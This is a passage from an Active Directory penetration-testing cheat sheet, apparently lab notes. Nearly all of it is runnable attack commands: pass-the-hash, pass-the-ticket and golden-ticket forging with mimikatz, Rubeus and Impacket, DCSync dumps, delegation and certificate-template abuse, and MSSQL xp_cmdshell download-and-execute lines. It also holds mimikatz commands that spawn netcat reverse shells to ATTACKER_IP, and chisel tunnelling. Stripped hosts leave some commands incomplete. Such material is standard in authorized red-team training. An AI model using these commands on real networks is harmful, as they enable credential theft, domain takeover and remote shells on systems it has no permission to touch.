pth-rpcclient -U test.local/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //

# net 
pth-net rpc share list -U 'ignite\Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38' -S

# curl
pth-curl --ntlm -u Administrator:32196B56FFE6F45E294117B91A83BF38

# Impacket Windows compiled tools 
psexec_windows.exe C:\AD\MyTools\psexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8"

wmiexec.exe wmiexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local

atexec.exe (In this case you need to specify a command, cmd.exe and powershell.exe are not valid to obtain an interactive shell)C:\AD\MyTools\atexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local 'whoami'

# Powershell wmiexec
Invoke-WMIExec -Target -Domain test.local -Username Administrator -Hash 32196B56FFE6F45E294117B91A83BF38 -Command "cmd /c mkdir c:\hacked" -Verbose

# Invoke-TheHash

# Invoke-SMBExec
Invoke-SMBExec -Target -Domain my.domain.local -Username username -Hash b38ff50264b74508085d82c69794a4d8 -Command 'powershell -ep bypass -Command "iex(iwr -UseBasicParsing)"' -verbose

# Invoke-WMIExec
Invoke-SMBExec -Target -Domain my.domain.local -Username username -Hash b38ff50264b74508085d82c69794a4d8 -Command 'powershell -ep bypass -Command "iex(iwr -UseBasicParsing)"' -verbose

# Invoke-SMBClient
Invoke-SMBClient -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff50264b74508085d82c69794a4d8 [-Action Recurse] -Source \\\C$\ -verbose

# Invoke-SMBEnum
Invoke-SMBEnum -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff50264b74


# Powershell Empire 
usemodule lateral_movement/invoke_smbexec
set ComputerName WIN-S0V7KMTVLD2.ignite.local
set Username Administrator
set Hash 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38
set Listener http


# Metasploit
use exploit/windows/smb/psexec
set rhosts
set smbuser administrator
set smbdomain test.local
set smbpass 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38

Over Pass the Hash/Pass the key (PTK)

This attack aims to use the user NTLM hash to request Kerberos tickets, as an alternative to the common Pass The Hash over NTLM protocol. Therefore, this could be especially useful in networks where NTLM protocol is disabled and only Kerberos is allowed as authentication protocol.

# We need the NTLM hash or password of the target user account in order to perform this attack. When hash is obtained we can request a TGT. We can access any service or machine where the user account has permission. 
python jurassic.park/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7
export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache
python jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass

-aesKey [AES Key] to specify to use AES256

Pass the Ticket

Similar to PTK, but instead we steal the ticket and use it to authenticate as its owner.

.\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt
.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd

# Swapping Linux and Windows tickets between platforms (Ticket converter script) 

# Only param needed is current ticket and output file. 
root@kali:ticket_converter# python velociraptor.ccache velociraptor.kirbi
Converting ccache => kirbi
root@kali:ticket_converter# python velociraptor.kirbi velociraptor.ccache
Converting kirbi => ccache
# To convert in windows, use Kekeo


# Pass the ticket attack 
# Linux 
export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK 
python jurassic.park/trex@labwws02.jurassic.park -k -no-pass

# Windows 
# Load the ticket in memory using mimikatz or Rubeus
mimikatz.exe "kerberos::ptt [0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi"
.\Rubeus.exe ptt /ticket:[0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi
klist #List tickets in cache to cehck that mimikatz has loaded the ticket
.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd


# We can obtain the Kerberos encryption keys from memory by using mimikatz with the following commands:

mimikatz # privilege::debug
mimikatz # sekurlsa::ekeys

# Depending on the available keys, we can run the following commands on mimikatz to get a reverse shell via Pass-the-Key:

# If we have the RC4 hash:
mimikatz# sekurlsa::pth /user:Administrator / /rc4:96ea24eff4dff1fbe13818fbf12ea7d8 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5556"

# If we have the AES128 hash:
mimikatz# sekurlsa::pth /user:Administrator / /aes128:b65ea8151f13a31d01377f5934bf3883 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5556"

# If we have the AES256 hash:
mimikatz# sekurlsa::pth /user:Administrator / /aes256:b54259bbff03af8d37a138c375e29254a2ca0649337cc4c73addcd696b4cdb65 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5556"

MSSQL Trusted Links

If a user has privileges to access MSSQL instances, he could be able to use it to execute commands in the MSSQL host (if running as SA).

# Powershell

Import-Module .\PowerupSQL.psd1

#Get local MSSQL instance (if any)
Get-SQLInstanceLocal | Get-SQLServerInfo

#If you don't have a AD account, you can try to find MSSQL scanning via UDP
#First, you will need a list of hosts to scan
Get-Content c:\temp\computers.txt | Get-SQLInstanceScanUDP –Verbose –Threads 10

#If you have some valid credentials and you have discovered valid MSSQL hosts you can try to login into them
#The discovered MSSQL servers must be on the file: C:\temp\instances.txt
Get-SQLInstanceFile -FilePath C:\temp\instances.txt | Get-SQLConnectionTest -Verbose -Username test -Password test

#Get info about valid MSQL instances running in domain
#This looks for SPNs that starts with MSSQL (not always is a MSSQL running instance)
Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose 

#Test connections with each one
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -verbose

#Try to connect and obtain info from each MSSQL server (also useful to check conectivity)
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose

#Dump an instance (a lotof CVSs generated in current dir)
Invoke-SQLDumpInfo -Verbose -Instance "dcorp-mssql"

#Look for MSSQL links of an accessible instance
Get-SQLServerLink -Instance dcorp-mssql -Verbose #Check for DatabaseLinkd > 0

#Crawl trusted links, starting form the given one (the user being used by the MSSQL instance is also specified)
Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Verbose

#If you are sysadmin in some trusted link you can enable xp_cmdshell with:
Get-SQLServerLinkCrawl -instance "<INSTANCE1>" -verbose -Query 'EXECUTE(''sp_configure ''''xp_cmdshell'''',1;reconfigure;'') AT "<INSTANCE2>"'

#Execute a query in all linked instances (try to execute commands), output should be in CustomQuery field
Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Query "exec master..xp_cmdshell 'whoami'"

#Obtain a shell
Get-SQLServerLinkCrawl -Instance dcorp-mssql  -Query 'exec master..xp_cmdshell "powershell iex (New-Object Net.WebClient).DownloadString('''')"'

#Check for possible vulnerabilities on an instance where you have access
Invoke-SQLAudit -Verbose -Instance "dcorp-mssql.dollarcorp.moneycorp.local"

#Try to escalate privileges on an instance
Invoke-SQLEscalatePriv –Verbose –Instance "SQLServer1\Instance1"

Unconstrained Delegation

This a feature that a Domain Administrator can set to any Computer inside the domain. Then, anytime a user logins onto the Computer, a copy of the TGT of that user is going to be sent inside the TGS provided by the DC and saved in memory in LSASS. So, if you have Administrator privileges on the machine, you will be able to dump the tickets and impersonate the users on any machine.

So if a domain admin logins inside a Computer with “Unconstrained Delegation” feature activated, and you have local admin privileges inside that machine, you will be able to dump the ticket and impersonate the Domain Admin anywhere (domain privesc).

What is DCSync attack?

A DCSync attack uses commands in Microsoft Directory Replication Service Remote Protocol (MS-DRSR) to pretend to be a domain controller (DC) in order to get user credentials from another DC

# You can find Computer objects with this attribute checking if the userAccountControl attribute contains ADS_UF_TRUSTED_FOR_DELEGATION. You can do this with an LDAP filter of ‘(userAccountControl:1.2.840.113556.1.4.803:=524288)’, which is what powerview does:

Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privesc
# Export tickets with Mimikatz
sekurlsa::tickets /export #Recommended way
kerberos::list /export #Another way
# Load the ticket of Administrator (or victim user) in memory with Mimikatz or Rubeus for a Pass the Ticket.
.\Rubeus.exe ptt /ticket:<base 64 ticket>

# Automatically compormise a print server
.\SpoolSample.exe printmachine unconstrinedmachine

# If the TGT is from a DC, you could perform a DCSync attack and get all the hashes from DC.
Invoke-Mimikatz -Command '"lsadump::dcsync /user:krbtgt"'

# Use secretsdump if my user have DCsync rights
python3 aghanim:password@

Constrained Delegation

If a user or computer is allowed for “Constrained Delegation” it will be able to impersonate any user to access some services in a computer. Then, if you compromise the hash of this user/computer you will be able to impersonate any user (even domain admins) to access some services.

# userAccountControl
# If a service account has a userAccountControl value containing TRUSTED_TO_AUTH_FOR_DELEGATION (T2A4D), then it can obtains a TGS for itself (the service) on behalf of any other user.

# msDS-AllowedToDelegateTo
# A service account could obtain a TGS on behalf any user to the service set in msDS-AllowedToDelegateTo. To do so, it first need a TGS from that user to itself, but it can use S4U2self to obtain that TGS before requesting the other one.

# Enumerate from PowerView
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

# Kekeo.exe and Mimikatz.exe 

# Obtain a TGT for the Constained allowed user
tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:8c6264140d5ae7d03f7f2a53088a291d

# Get a TGS for the service you are allowed (in this case time) and for other one (in this case LDAP)
tgs::s4u /tgt:TGT_dcorpadminsrv$@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLAR CORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap/dcorpdc.dollarcorp.moneycorp.LOCAL

# Load the TGS in memory
Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_ldap~ dcorp-dc.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL_ALT.kirbi"'  

# Rubeus 

# Obtain a TGT for the Constained allowed user
.\Rubeus.exe asktgt /user:websvc /rc4:cc098f204c5887eaa8253e7c2749156f /outfile:TGT_websvc.kirbi

# Obtain a TGS of the Administrator user to self
.\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /impersonateuser:Administrator /outfile:TGS_administrator

# Obtain service TGS impersonating Administrator (CIFS)
.\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /tgs:TGS_administrator_Administrator@DOLLARCORP.MONEYCORP.LOCAL_to_websvc@DOLLARCORP.MONEYCORP.LOCAL /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /outfile:TGS_administrator_CIFS

# Impersonate Administrator on different service (HOST)
.\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /tgs:TGS_administrator_Administrator@DOLLARCORP.MONEYCORP.LOCAL_to_websvc@DOLLARCORP.MONEYCORP.LOCAL /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /altservice:HOST /outfile:TGS_administrator_HOST

# Load ticket in memory
.\Rubeus.exe ptt /ticket:TGS_administrator_CIFS_HOST-dcorp-mssql.dollarcorp.moneycorp.local

EXAMPLE – GenericAll permission to Computer Object – Resource based Constrained delegation attack

See notes for Resourced box

# The attacker can pass-the-ticket and impersonate the user to gain access to the victim.
# To check the MachineAccountQuota of the domain you can use:
Get-DomainObject -Identity "dc=domain,dc=local" -Domain domain.local | select MachineAccountQuota

# Attack
# Creating a Computer Object
# You can create a computer object inside the domain using :
Import-Module .\powermad.ps1
New-MachineAccount -MachineAccount FAKECOMPUTER -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose

Get-DomainComputer FAKECOMPUTER #Check if created if you have powerview

# Performing a complete S4U attack
# First of all, we created the new Computer object with the password 123456, so we need the hash of that password:
.\Rubeus.exe hash /password:123456 /user:FAKECOMPUTER$ /domain:domain.local

# This will print the RC4 and AES hashes for that account.
# Now, the attack can be performed. Just use on of the hash types, not all of them :
rubeus.exe s4u /user:FAKECOMPUTER$ /aes256:<aes256 hash> /aes128:<aes128 hash> /rc4:<rc4 hash> /impersonateuser:administrator /msdsspn:cifs/victim.domain.local /domain:domain.local /ptt

# You can generate more tickets just asking once using the /altservice param of Rubeus:
rubeus.exe s4u /user:FAKECOMPUTER$ /aes256:<AES 256 hash> /impersonateuser:administrator /msdsspn:cifs/victim.domain.local /altservice:krbtgt,cifs,host,http,winrm,RPCSS,wsman,ldap /domain:domain.local /ptt

### Note that users has an attribute called "Cannot be delegated". If a user has this attribute to True, you won't be able to impersonate him . This property can be seen inside bloodhound.

# Accessing
# The last command line will perform the complete S4U attack and will inject the TGS from Administrator to the victim host in memory.
In this example it was requested a TGS for the CIFS service from Administrator, so you will be able to access C$:
ls \\victim.domain.local\C$

# Create a new machine account on the domain 
impacket-addcompiter resourced.local/l.livingstone -dc-ip -hashes :<LM-hash> -computer-name 'FAKECOMPUTER$' -computer-pass '123456'

# Verify that the machine account was added to the domain. Must be done through a shell on the Windows. 
*Evil-WinRM* PS C:\Users\l.livingstone\Documents> Get-ADComputer FAKECOMPUTER

# Manage delegation rights by using and use it to set msDS-AllowedToActOnBehalfOfOtherIdentity on our new machine account
python3 -dc-ip -t RESOURCEDC -f 'FAKECOMPUTER' -hashes :<LM-hash> resourced\\l.livingstone

# Confirm that the action was successful
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> Get-adcomputer resourcedc -properties msds-allowedtoactonbehalfofotheridentity |select -expand msds-allowedtoactonbehalfofotheridentity

# We now need to get the administrator service ticket. We can do this by using impacket-getST with our privileged machine account.
/usr/bin/impacket-getST -spn cifs/resourcedc.resourced.local resourced/FAKECOMPUTEr$:'123456' -impersonate Administrator -dc-ip

# The ticket is aved on our attacker machine as Administrator.ccache. Export the environment variable named KRB5CCNAME with the location of file
export KRB5CCNAME=./Administrator.ccache

# Use psexec to get a shell
/usr/bin/impacket-psexec -k -no-pass resourcedc.resourced.local -dc-ip

Desc from BloodHound

# Full control of a computer object can be used to perform a resource based constrained delegation attack. Abusing this primitive is currently only possible through the Rubeus project. 

# First, if an attacker does not control an account with an SPN set, Kevin Robertson's Powermad project can be used to add a new attacker-controlled computer account: 

New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)

# PowerView can be used to then retrieve the security identifier (SID) of the newly created computer account: 

$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid

# We now need to build a generic ACE with the attacker-added computer SID as the principal, and get the binary bytes for the new DACL/ACE: 

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" 
$SDBytes = New-Object byte[] ($SD.BinaryLength) 
$SD.GetBinaryForm($SDBytes, 0)

# Next, we need to set this newly created security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the comptuer account we're taking over, again using PowerView in this case: 

Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

# We can then use Rubeus to hash the plaintext password into its RC4_HMAC form:

Rubeus.exe hash /password:Summer2018!

# And finally we can use Rubeus' *s4u* module to get a service ticket for the service name (sname) we want to "pretend" to be "admin" for. This ticket is injected (thanks to /ptt), and in this case grants us access to the file system of the TARGETCOMPUTER: 

Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:admin /msdsspn:cifs/TARGETCOMPUTER.testlab.local /ptt


impacket-secretsdump -hashes :NTLM_HASH -dc-ip DC_IP -outfile dcsync.txt 

ACLs Abuse

Printer Spooler service abuse

If the Print Spooler service is enabled, you can use some already known AD credentials to request to the Domain Controller’s print server an update on new print jobs and just tell it to send the notification to some system.

# Finding Windows servers on the domain 
Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "2016") -and (Enabled -eq "True")} -Properties * | select Name | ft -HideTableHeaders > servers.txt

# Finding spooler services listening 
. .\Get-SpoolStatus.ps1
ForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}


# Ask service to authenticate against an arbitrary host 
SpoolSample.exe <TARGET> <RESPONDERIP>

# For linux use 
python -d domain -u username -p password <RESPONDERIP> <TARGET> 'domain/username:password'@<Printer IP> <RESPONDERIP>


# Bypass authentication and gain administrator-level privileges in a matter of seconds. If vulnerable. 

# Test for zerologon

# PoC

AD CS Domain Escalation

Active Directory Certificate Services (AD CS) is a Microsoft platform that provides a variety of security functions to protect digital certificates within an organization. However, a problem has been identified whereby some AD CS settings are not properly configured, which can leave the system vulnerable to attackers.

The issue arises when attackers exploit this vulnerability to obtain unauthorized certificates. These certificates can then be used to gain access to areas of the network or impersonate individuals they should not have access to. For instance, an attacker could potentially gain a certificate that enables them to impersonate a network administrator and thereby gain unrestricted access to sensitive data.






# List all vulnerable template 
certipy find -dc-only -target-ip -u USER -p PASSWORD -target -vulnerable -timeout 120 

# If user have enrollment rights on a template it is possible to obtain valid certificate for all valid users and domain admins. The certificate and private key will be safed in a .pfx file. 
certipy req -u USER -p PASSWORD -target -target -template template01 -ca "domain-issuing-CA" -upn "domainadmin01"

# Retriev NTLM hash for domain admin 
certipy auth -pfx domainadmin01.pfx -domain

# Now, pass the hash using desired tool.
crackmapexec smb -u domainadmin01 -H ntlm_hash


Tunnelling/ Proxying

# Using Chisel to make a proxy. Notice that the proxy port opens on 1080, rather than listening port (37777).
# Attacker machine
chisel server -p 37777 --reverse
# Target machine
./chisel client Attacker-IP:37777 R:socks

# Now in Proxychain config file /etc/proxychains4.conf add the proxy port
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 1080

# Now when you run can reach other target on the network using proxychains. So it looks like this Attacker machine --SOCKS proxy --> on port 1080 --> (Unreachable from attacker). 
proxychains nc -vn 3389 

# Or in the case of the THM box Wreath. If I want to run the GitStack exploit from my attacker to (Which is unreachable withouth proxy or tunnel).
proxychains python2 

# OR by using foxy proxy if I want to access http.
# Add a new proxy. Proxy type = SOCKS5 (chisel uses socks5), IP =, Port = Proxy prot (1080).
# And start foxy proxy. Now I can access the webserver on.
# I can also use proxychains to access HTTP.
proxychains firefox. 
# This will open firefox through proxychains. 

# Simulate a VPN tunnel using sshuttle. Now I can reach other targets, which originally was unreacheable, on the network by going through 
sshuttle -r user@ --ssh-cmd "ssh -i private_key"

Port Forwarding

# -L means portforwarding. This will forward port 80 on host to our attacker on port 8000. Can access the port (webserver) by typing localhost:8000. 
ssh -L 8000: user@ -fN

Post-exploitation with high privileged account

Once you get Domain Admin or Enterprise Admin you can dump the domain database: ntds.dit.

Dumping Domain Credentials


Golden Ticket

A valid TGT as any user can be created using the NTLM hash of the krbtgt AD account. The advantage of forging a TGT instead of TGS is being able to access any service (or machine) in the domain and the impersonated user.

# Find domain SID.
whoami /user # Need to be logged in as a user and not nt authority\system

# Or use PowerView.ps1 

# Use mimikatz to generate a golden ticket
mimikatz # privilege::debug
mimikatz # kerberos::golden /user:alice / /sid:S-1-5-21-466546139-763938477-1796994327 / /service:HTTP /rc4:7f004ce6b8f7b2a3b6c477806799b9c0 /ptt

kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt
.\Rubeus.exe ptt /ticket:ticket.kirbi
klist #List tickets in memory

# Example using aes key
kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /aes256:430b2fdb13cc820d73ecf123dddd4c9d76425d4c2156b89ac551efb9d591a439 /ticket:golden.kirbi

# Linux - impacket
python -nthash 25b2076cda3bfd6209161a6c78a69c1c -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park stegosaurus
export KRB5CCNAME=/root/impacket-examples/stegosaurus.ccache
python jurassic.park/stegosaurus@lab-wdc02.jurassic.park -k -no-pass

# With the golden ticket injected into memory, we can launch a new command prompt with
misc::cmd and again attempt lateral movement with PsExec.
psexec.exe \\dc01 cmd.exe

Silver Ticket

AdminSDHolder Group

DSRM Credentials

ACL Persistence

Security Descriptors

Skelton Key

Custom SSP


You got domain admin, now what

You got Domain Admin, now what?. Typically when you’re starting out on… | by Jevon Davis | InfoSec Write-ups (